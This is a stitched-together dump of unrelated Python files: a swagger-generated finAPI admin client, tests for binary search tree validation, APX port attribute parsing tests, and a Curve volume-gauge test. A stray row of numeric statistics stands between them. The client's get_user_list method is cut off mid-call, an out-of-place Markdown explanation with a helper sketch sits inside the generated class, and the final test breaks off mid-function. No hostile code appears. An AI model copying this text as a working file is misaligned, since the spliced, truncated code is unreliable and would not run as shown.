OpenAPI spec version: v1.42.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class MandatorAdministrationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def change_client_credentials(self, body, **kwargs): # noqa: E501
"""Change client credentials # noqa: E501
Change the client_secret for any of your clients, including the mandator admin client. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. <br/><br/>NOTES:<br/>• When you change a client's secret, then all of its existing access tokens will be revoked. User access tokens are not affected.<br/>• finAPI is storing client secrets with a one-way encryption. A lost client secret can NOT be recovered. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_client_credentials(body, async=True)
>>> result = thread.get()
:param async bool
:param ChangeClientCredentialsParams body: Parameters for changing client credentials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.change_client_credentials_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.change_client_credentials_with_http_info(body, **kwargs) # noqa: E501
return data
def change_client_credentials_with_http_info(self, body, **kwargs): # noqa: E501
"""Change client credentials # noqa: E501
Change the client_secret for any of your clients, including the mandator admin client. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. <br/><br/>NOTES:<br/>• When you change a client's secret, then all of its existing access tokens will be revoked. User access tokens are not affected.<br/>• finAPI is storing client secrets with a one-way encryption. A lost client secret can NOT be recovered. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_client_credentials_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param ChangeClientCredentialsParams body: Parameters for changing client credentials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_client_credentials" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `change_client_credentials`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['finapi_auth'] # noqa: E501
return self.api_client.call_api(
'/api/v1/mandatorAdmin/changeClientCredentials', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
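Each generated endpoint method repeats the same keyword-argument handshake: build the list of allowed parameter names, reject unknown kwargs with a `TypeError`, and require `body` with a `ValueError`. A condensed, standalone sketch of that validation logic (illustrative only, not the real client code):

```python
def validate_call_params(required, allowed, **kwargs):
    """Replicate the swagger-codegen parameter checks seen above.

    Raises TypeError for unexpected keyword arguments and ValueError
    when a required parameter is missing or None.
    """
    # The generator always whitelists these internal options too.
    allowed = set(allowed) | {"async", "_return_http_data_only",
                              "_preload_content", "_request_timeout"}
    for key in kwargs:
        if key not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'" % key)
    for name in required:
        if kwargs.get(name) is None:
            raise ValueError(
                "Missing the required parameter `%s`" % name)
    return {k: v for k, v in kwargs.items() if v is not None}
```

The generated methods inline this logic per endpoint; factoring it out as above is a design alternative, not what swagger-codegen actually emits.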
def delete_users(self, body, **kwargs): # noqa: E501
"""Delete users # noqa: E501
Delete one or several users, which are specified by a given list of identifiers. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. <br/><br/><b>NOTE</b>: finAPI may fail to delete one (or several, or all) of the specified users. A user cannot get deleted when his data is currently locked by an internal process (for instance, update of a bank connection or transactions categorization). The response contains the identifiers of all users that could not get deleted, and all users that could get deleted, separated in two lists. The mandator admin client can retry the request at a later time for the users who could not get deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_users(body, async=True)
>>> result = thread.get()
:param async bool
:param UserIdentifiersParams body: List of user identifiers (required)
:return: UserIdentifiersList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_users_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.delete_users_with_http_info(body, **kwargs) # noqa: E501
return data
def delete_users_with_http_info(self, body, **kwargs): # noqa: E501
"""Delete users # noqa: E501
Delete one or several users, which are specified by a given list of identifiers. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. <br/><br/><b>NOTE</b>: finAPI may fail to delete one (or several, or all) of the specified users. A user cannot get deleted when his data is currently locked by an internal process (for instance, update of a bank connection or transactions categorization). The response contains the identifiers of all users that could not get deleted, and all users that could get deleted, separated in two lists. The mandator admin client can retry the request at a later time for the users who could not get deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_users_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param UserIdentifiersParams body: List of user identifiers (required)
:return: UserIdentifiersList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_users" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_users`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['finapi_auth'] # noqa: E501
return self.api_client.call_api(
'/api/v1/mandatorAdmin/deleteUsers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserIdentifiersList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_list(self, **kwargs): # noqa: E501
"""Get user list # noqa: E501
        <p>Get a list of the users of the mandator that is authorized by the access_token. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. You can set optional search criteria to get only those users that you are interested in. If you do not specify any search criteria, then this service functions as a 'get all' service.</p><p>Note that the original user id is no longer available in finAPI once a user has been deleted. Because of this, the userId of deleted users will be a distorted version of the original userId. For example, if the deleted user's id was originally 'user', then this service will return 'uXXr' as the userId.</p>  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_user_list(async=True)
>>> result = thread.get()
:param async bool
:param str min_registration_date: Lower bound for a user's registration date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'registrationDate' is equal to or later than the given date will be regarded.
:param str max_registration_date: Upper bound for a user's registration date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'registrationDate' is equal to or earlier than the given date will be regarded.
:param str min_deletion_date: Lower bound for a user's deletion date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'deletionDate' is not null, and is equal to or later than the given date will be regarded.
:param str max_deletion_date: Upper bound for a user's deletion date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'deletionDate' is null, or is equal to or earlier than the given date will be regarded.
:param str min_last_active_date: Lower bound for a user's last active date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'lastActiveDate' is not null, and is equal to or later than the given date will be regarded.
:param str max_last_active_date: Upper bound for a user's last active date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'lastActiveDate' is null, or is equal to or earlier than the given date will be regarded.
:param bool include_monthly_stats: Whether to include the 'monthlyStats' for the returned users. If not specified, then the field defaults to 'false'.
:param str monthly_stats_start_date: Minimum bound for the monthly stats (=oldest month that should be included). Must be passed in the format 'YYYY-MM'. If not specified, then the monthly stats will go back up to the first month in which the user existed (date of the user's registration). Note that this field is only regarded if 'includeMonthlyStats' = true.
:param str monthly_stats_end_date: Maximum bound for the monthly stats (=latest month that should be included). Must be passed in the format 'YYYY-MM'. If not specified, then the monthly stats will go up to either the current month (for active users), or up to the month of deletion (for deleted users). Note that this field is only regarded if 'includeMonthlyStats' = true.
:param bool is_deleted: If NOT specified, then the service will regard both active and deleted users in the search. If set to 'true', then ONLY deleted users will be regarded. If set to 'false', then ONLY active users will be regarded.
:param int page: Result page that you want to retrieve
:param int per_page: Maximum number of records per page. Can be at most 500. NOTE: Due to its validation and visualization, the swagger frontend might show very low performance, or even crashes, when a service responds with a lot of data. It is recommended to use a HTTP client like Postman or DHC instead of our swagger frontend for service calls with large page sizes.
:param list[str] order: Determines the order of the results. You can order the results by 'userId'. The default order for this service is 'userId,asc'. The general format is: 'property[,asc|desc]', with 'asc' being the default value.
:return: PageableUserInfoList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_user_list_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_user_list_with_http_info(**kwargs) # noqa: E501
return data
def get_user_list_with_http_info(self, **kwargs): # noqa: E501
"""Get user list # noqa: E501
        <p>Get a list of the users of the mandator that is authorized by the access_token. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. You can set optional search criteria to get only those users that you are interested in. If you do not specify any search criteria, then this service functions as a 'get all' service.</p><p>Note that the original user id is no longer available in finAPI once a user has been deleted. Because of this, the userId of deleted users will be a distorted version of the original userId. For example, if the deleted user's id was originally 'user', then this service will return 'uXXr' as the userId.</p>  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_user_list_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str min_registration_date: Lower bound for a user's registration date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'registrationDate' is equal to or later than the given date will be regarded.
:param str max_registration_date: Upper bound for a user's registration date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'registrationDate' is equal to or earlier than the given date will be regarded.
        :param str min_deletion_date: Lower bound for a user's deletion date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'deletionDate' is not null, and is equal to or later than the given date will be regarded.
        :param str max_deletion_date: Upper bound for a user's deletion date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'deletionDate' is null, or is equal to or earlier than the given date will be regarded.
        :param str min_last_active_date: Lower bound for a user's last active date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'lastActiveDate' is not null, and is equal to or later than the given date will be regarded.
        :param str max_last_active_date: Upper bound for a user's last active date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'lastActiveDate' is null, or is equal to or earlier than the given date will be regarded.
        :param bool include_monthly_stats: Whether to include the 'monthlyStats' for the returned users. If not specified, then the field defaults to 'false'.
        :param str monthly_stats_start_date: Minimum bound for the monthly stats (=oldest month that should be included). Must be passed in the format 'YYYY-MM'. If not specified, then the monthly stats will go back up to the first month in which the user existed (date of the user's registration). Note that this field is only regarded if 'includeMonthlyStats' = true.
        :param str monthly_stats_end_date: Maximum bound for the monthly stats (=latest month that should be included). Must be passed in the format 'YYYY-MM'. If not specified, then the monthly stats will go up to either the current month (for active users), or up to the month of deletion (for deleted users). Note that this field is only regarded if 'includeMonthlyStats' = true.
        :param bool is_deleted: If NOT specified, then the service will regard both active and deleted users in the search. If set to 'true', then ONLY deleted users will be regarded. If set to 'false', then ONLY active users will be regarded.
        :param int page: Result page that you want to retrieve.
        :param int per_page: Maximum number of records per page. Can be at most 500. NOTE: Due to its validation and visualization, the swagger frontend might show very low performance, or even crash, when a service responds with a lot of data. It is recommended to use an HTTP client like Postman or DHC instead of our swagger frontend for service calls with large page sizes.
        :param list[str] order: Determines the order of the results. You can order the results by 'userId'. The default order for this service is 'userId,asc'. The general format is: 'property[,asc|desc]', with 'asc' being the default value.
        :return: PageableUserInfoList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['min_registration_date', 'max_registration_date', 'min_deletion_date', 'max_deletion_date', 'min_last_active_date', 'max_last_active_date', 'include_monthly_stats', 'monthly_stats_start_date', 'monthly_stats_end_date', 'is_deleted', 'page', 'per_page', 'order']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_user_list" % key
                )
            params[key] = val
        del params['kwargs']

        if 'page' in params and params['page'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `page` when calling `get_user_list`, must be a value greater than or equal to `1`")  # noqa: E501
        if 'per_page' in params and params['per_page'] > 500:  # noqa: E501
            raise ValueError("Invalid value for parameter `per_page` when calling `get_user_list`, must be a value less than or equal to `500`")  # noqa: E501
        if 'per_page' in params and params['per_page'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `per_page` when calling `get_user_list`, must be a value greater than or equal to `1`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'min_registration_date' in params:
            query_params.append(('minRegistrationDate', params['min_registration_date']))  # noqa: E501
        if 'max_registration_date' in params:
            query_params.append(('maxRegistrationDate', params['max_registration_date']))  # noqa: E501
        if 'min_deletion_date' in params:
            query_params.append(('minDeletionDate', params['min_deletion_date']))  # noqa: E501
        if 'max_deletion_date' in params:
            query_params.append(('maxDeletionDate', params['max_deletion_date']))  # noqa: E501
        if 'min_last_active_date' in params:
            query_params.append(('minLastActiveDate', params['min_last_active_date']))  # noqa: E501
        if 'max_last_active_date' in params:
            query_params.append(('maxLastActiveDate', params['max_last_active_date']))  # noqa: E501
        if 'include_monthly_stats' in params:
            query_params.append(('includeMonthlyStats', params['include_monthly_stats']))  # noqa: E501
        if 'monthly_stats_start_date' in params:
            query_params.append(('monthlyStatsStartDate', params['monthly_stats_start_date']))  # noqa: E501
        if 'monthly_stats_end_date' in params:
            query_params.append(('monthlyStatsEndDate', params['monthly_stats_end_date']))  # noqa: E501
        if 'is_deleted' in params:
            query_params.append(('isDeleted', params['is_deleted']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        if 'per_page' in params:
            query_params.append(('perPage', params['per_page']))  # noqa: E501
        if 'order' in params:
            query_params.append(('order', params['order']))  # noqa: E501
            collection_formats['order'] = 'multi'  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # Authentication setting
        auth_settings = ['finapi_auth']  # noqa: E501

        return self.api_client.call_api(
            '/api/v1/mandatorAdmin/getUserList', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageableUserInfoList',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
| 67.108635 | 786 | 0.681513 | 3,387 | 24,092 | 4.722173 | 0.10747 | 0.028011 | 0.020195 | 0.015006 | 0.917094 | 0.899275 | 0.884832 | 0.866888 | 0.858134 | 0.858134 | 0 | 0.019787 | 0.234352 | 24,092 | 358 | 787 | 67.296089 | 0.847284 | 0.028972 | 0 | 0.631016 | 1 | 0.016043 | 0.250418 | 0.07898 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.02139 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
# ==== problems/test_ic_valid_bst.py (gregdferrell/algo, MIT) ====
from .ic_valid_bst import is_tree_valid_bst
from .problem_solve_util import BinaryTreeNode


def test_is_valid_bst_1():
    #
    #         50
    #        /  \
    #      30    80
    #     /  \  /  \
    #   20  40 70  90
    #
    root_node = BinaryTreeNode(50, None)
    assert is_tree_valid_bst(root_node)
    new_node = root_node.insert_left(30)
    assert is_tree_valid_bst(root_node)
    new_node.insert_left(20)
    assert is_tree_valid_bst(root_node)
    new_node.insert_right(40)
    assert is_tree_valid_bst(root_node)
    new_node = root_node.insert_right(80)
    assert is_tree_valid_bst(root_node)
    new_node.insert_left(70)
    assert is_tree_valid_bst(root_node)
    new_node.insert_right(90)
    assert is_tree_valid_bst(root_node)


def test_is_balanced_depth_search_right():
    # Create the following tree, testing after each node insert
    #   10
    #  /  \
    # 5    20
    #        \
    #         25
    #           \
    #            30
    root_node = BinaryTreeNode(10, None)
    assert is_tree_valid_bst(root_node)
    new_node = root_node.insert_right(20)
    assert is_tree_valid_bst(root_node)
    new_node = new_node.insert_right(25)
    assert is_tree_valid_bst(root_node)
    new_node = new_node.insert_right(30)
    assert is_tree_valid_bst(root_node)
    new_node = root_node.insert_left(5)
    assert is_tree_valid_bst(root_node)


def test_is_balanced_depth_search_left():
    # Create the following tree, testing after each node insert
    #       10
    #      /  \
    #     5    20
    #    /    /
    #   4    21
    #  /
    # 3
    root_node = BinaryTreeNode(10, None)
    assert is_tree_valid_bst(root_node)
    new_node = root_node.insert_left(5)
    assert is_tree_valid_bst(root_node)
    new_node = new_node.insert_left(4)
    assert is_tree_valid_bst(root_node)
    new_node = new_node.insert_left(3)
    assert is_tree_valid_bst(root_node)
    new_node = root_node.insert_right(20)
    assert is_tree_valid_bst(root_node)
    new_node = new_node.insert_left(21)
    assert not is_tree_valid_bst(root_node)


def test_is_balanced_depth_search_simple_left():
    #   50
    #  /
    # 30
    #   \
    #    60
    root_node = BinaryTreeNode(50, None)
    new_node = root_node.insert_left(30)
    new_node = new_node.insert_right(60)
    assert not is_tree_valid_bst(root_node)


def test_is_balanced_depth_search_simple_right():
    # 50
    #   \
    #    60
    #   /
    #  40
    root_node = BinaryTreeNode(50, None)
    new_node = root_node.insert_right(60)
    new_node = new_node.insert_left(40)
    assert not is_tree_valid_bst(root_node)


def test_is_valid_bst_gotcha():
    #
    #         50
    #        /  \
    #      30    80
    #     /  \  /  \
    #   20  60 70  90
    #
    root_node = BinaryTreeNode(50, None)
    assert is_tree_valid_bst(root_node)
    new_node = root_node.insert_left(30)
    assert is_tree_valid_bst(root_node)
    new_node.insert_left(20)
    assert is_tree_valid_bst(root_node)
    new_node.insert_right(60)
    assert not is_tree_valid_bst(root_node)
    new_node = root_node.insert_right(80)
    assert not is_tree_valid_bst(root_node)
    new_node.insert_left(70)
    assert not is_tree_valid_bst(root_node)
    new_node.insert_right(90)
    assert not is_tree_valid_bst(root_node)
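The "gotcha" test above catches the classic mistake of comparing each node only to its parent: 60 sits in 50's left subtree, so the tree is invalid even though 60 > 30 locally. A minimal bounds-passing sketch of the property these tests exercise (plain tuples stand in for BinaryTreeNode here; this helper is illustrative, not the repo's implementation):

```python
def is_valid_bst(node, lo=float('-inf'), hi=float('inf')):
    # Each node must fall strictly inside the (lo, hi) window inherited
    # from all of its ancestors, not just satisfy its direct parent.
    if node is None:
        return True
    value, left, right = node
    if not (lo < value < hi):
        return False
    return is_valid_bst(left, lo, value) and is_valid_bst(right, value, hi)
```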
# ==== tests/port_attribute_test.py (ovenystas/py-apx, MIT) ====
import os, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import apx
import unittest


class TestPortAttribute(unittest.TestCase):

    def test_integer_init_value(self):
        attr = apx.base.PortAttribute('=0')
        self.assertEqual(attr.isQueued, False)
        self.assertEqual(attr.isParameter, False)
        self.assertEqual(attr.initValue.valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.value, 0)

        attr = apx.base.PortAttribute('=255')
        self.assertEqual(attr.isQueued, False)
        self.assertEqual(attr.isParameter, False)
        self.assertEqual(attr.initValue.valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.value, 255)

        attr = apx.base.PortAttribute('={3,3,7}')
        self.assertEqual(attr.isQueued, False)
        self.assertEqual(attr.isParameter, False)
        self.assertEqual(attr.initValue.valueType, apx.VTYPE_LIST)
        self.assertEqual(len(attr.initValue.elements), 3)
        self.assertEqual(attr.initValue.elements[0].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[0].value, 3)
        self.assertEqual(attr.initValue.elements[1].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[1].value, 3)
        self.assertEqual(attr.initValue.elements[2].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[2].value, 7)

    def test_string_init_value(self):
        attr = apx.base.PortAttribute('="InitValue"')
        self.assertEqual(attr.isQueued, False)
        self.assertEqual(attr.isParameter, False)
        self.assertEqual(attr.initValue.valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.value, "InitValue")

        attr = apx.base.PortAttribute('=""')
        self.assertEqual(attr.isQueued, False)
        self.assertEqual(attr.isParameter, False)
        self.assertEqual(attr.initValue.valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.value, "")

        attr = apx.base.PortAttribute('={"a","b","", "c"}')
        self.assertEqual(attr.isQueued, False)
        self.assertEqual(attr.isParameter, False)
        self.assertEqual(attr.initValue.valueType, apx.VTYPE_LIST)
        self.assertEqual(len(attr.initValue.elements), 4)
        self.assertEqual(attr.initValue.elements[0].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[0].value, "a")
        self.assertEqual(attr.initValue.elements[1].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[1].value, "b")
        self.assertEqual(attr.initValue.elements[2].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[2].value, "")
        self.assertEqual(attr.initValue.elements[3].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[3].value, "c")

    def test_record_init_value(self):
        attr = apx.base.PortAttribute('={1,2,3}')
        self.assertEqual(attr.isQueued, False)
        self.assertEqual(attr.isParameter, False)
        self.assertEqual(attr.initValue.valueType, apx.VTYPE_LIST)
        self.assertEqual(len(attr.initValue.elements), 3)
        self.assertEqual(attr.initValue.elements[0].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[0].value, 1)
        self.assertEqual(attr.initValue.elements[1].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[1].value, 2)
        self.assertEqual(attr.initValue.elements[2].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[2].value, 3)

        attr = apx.base.PortAttribute('={{255,255,255},15}')
        self.assertEqual(attr.isQueued, False)
        self.assertEqual(attr.isParameter, False)
        self.assertEqual(attr.initValue.valueType, apx.VTYPE_LIST)
        self.assertEqual(len(attr.initValue.elements), 2)
        self.assertEqual(attr.initValue.elements[0].valueType, apx.VTYPE_LIST)
        self.assertEqual(len(attr.initValue.elements[0].elements), 3)
        self.assertEqual(attr.initValue.elements[0].elements[0].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[0].elements[0].value, 255)
        self.assertEqual(attr.initValue.elements[0].elements[1].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[0].elements[1].value, 255)
        self.assertEqual(attr.initValue.elements[0].elements[2].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[0].elements[2].value, 255)
        self.assertEqual(attr.initValue.elements[1].valueType, apx.VTYPE_SCALAR)
        self.assertEqual(attr.initValue.elements[1].value, 15)
if __name__ == '__main__':
    unittest.main()
eef6dfb30ece9f35d700ee0a24cc87479966cc66 | 35,587 | py | Python | tests/test_03_yvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 3 | 2020-12-17T01:11:08.000Z | 2020-12-24T08:06:07.000Z | tests/test_03_yvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 13 | 2020-11-22T20:24:23.000Z | 2021-01-07T20:19:57.000Z | tests/test_03_yvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 3 | 2020-12-17T18:32:46.000Z | 2020-12-23T21:57:47.000Z | #!/usr/bin/python3
import pytest
PERIOD = 30
DENOMINATOR = 10 ** 18
SMOOTHING = 2
ALPHA = DENOMINATOR - SMOOTHING * DENOMINATOR / (PERIOD + 1)
def test_exchange_ydai_to_yusdc(_yvolgauge, ypool, yDAI, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yDAI)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yDAI)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_yusdc_to_ydai(_yvolgauge, ypool, yUSDC, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yUSDC)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yUSDC)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")


def test_exchange_ydai_to_yusdt(_yvolgauge, ypool, yDAI, tracker, accounts):
    for i in range(5):
        print("Attempt #" + str(i + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = _yvolgauge.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = ypool.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        lastvolumedata = tracker.lastVolumeData(yDAI)
        last_volume = lastvolumedata[0]
        last_amount = lastvolumedata[1]
        currentvolumedata = tracker.currentVolumeData(yDAI)
        current_volume = currentvolumedata[0]
        current_amount = currentvolumedata[1]
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
